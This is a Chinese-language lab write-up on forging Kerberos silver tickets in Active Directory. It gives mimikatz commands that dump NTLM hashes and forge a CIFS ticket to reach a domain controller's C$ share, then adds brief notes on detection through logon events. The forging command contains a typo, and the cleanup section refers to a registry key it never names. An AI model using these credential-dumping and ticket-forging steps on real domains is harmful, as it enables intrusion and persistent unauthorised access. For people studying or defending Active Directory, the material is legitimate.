0%

域渗透维权之银票

0x00前言

利用PTT票据传递攻击,就可以替代明文密码。PTT包括金票和银票利用

0x01 简介

白银票据用来伪造ST。我们实验利用白银票据提升普通用户的条件、利用方式及检测攻击方式介绍如下

IP 描述
192.168.221.139 DC
192.168.221.140 域成员

0x02票据生成条件

  • 域名

    1
    net config workstation

  • 域SID

    1
    whoami /user

  • 需要目标server的NTLM-hash

    1
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1og.txt

    windows居然可以支持cat哎,太感动了

  • 伪造任意用户名给予某服务权限

0x03 票据伪造及利用:

生成票据:

1
2
kerberos::gloden /user:swanq /domain:wlaq.com /sid:S-1-5-21-160213220-343523822-3012469542
/rc4:44fc74f5b9978830e7ec7dbd66cb4324 /target:WIN-2019-DC.wlaq.com /service:cifs /ptt

此时会成功开启cifs服务的白银票据,即可访问域控主机的共享目录

1
dir \\WIN-2019-DC\c$

为普通域用户增加某计算机的登录权限:AC中某user->右键属性->账户->登录到->下列计算机->键入计算机名即可

1
2
查看计算机名/主机名:hostname
验证某计算机是否位于特定于:nltest /dsgetdc:wlaq

0x04 检测及清理

检测:

请求域控ntlm-hash日志记录如下,注意到在申请ntlm hash时会产生此异地申请hash地址(其中域控IP为139)。

kerberos

此攻击与域控无AS-REQ 、AS-REP通信,也无TGS-REQ / TGS-REP通信。所有的事件日志都在目标服务器上,所以银票的检测比金票更加困难。但是可以通过查看4624的登陆日志,查看IpAddress选项处的IP是否常用用户和请求的SID是否匹配来进行检测。同时结合后续攻击行为来判断域内主机是否失陷。

清除:

银票使用的是server的哈希,存储于存储域中所有用户的密码哈希的KDC密钥分发中心中。

作为使得白银票据持久化的方式,此注册表的键值可用来长期监控以防银票攻击。

参考:

  1. https://shu1l.github.io/2020/06/06/qian-xi-huang-jin-piao-ju-yu-bai-yin-piao-ju/
  2. https://www.jianshu.com/p/4936da524040
  3. https://ares-x.com/2020/03/21/%E5%9F%9F%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%83%EF%BC%89PTT-%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB/
  4. https://www.k0rz3n.com/2019/03/17/%E6%B5%85%E6%9E%90%20Kerberos%20%E8%AE%A4%E8%AF%81%E8%BF%87%E7%A8%8B%E4%BB%A5%E5%8F%8A%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/#2-%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE-Silver-Ticket
  5. NTLM-hash:https://www.cnblogs.com/0d4y/p/12805112.html
  6. mimkatz官方参考:https://wooyun.js.org/drops/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part3.html
你想在文章末尾对读者说的话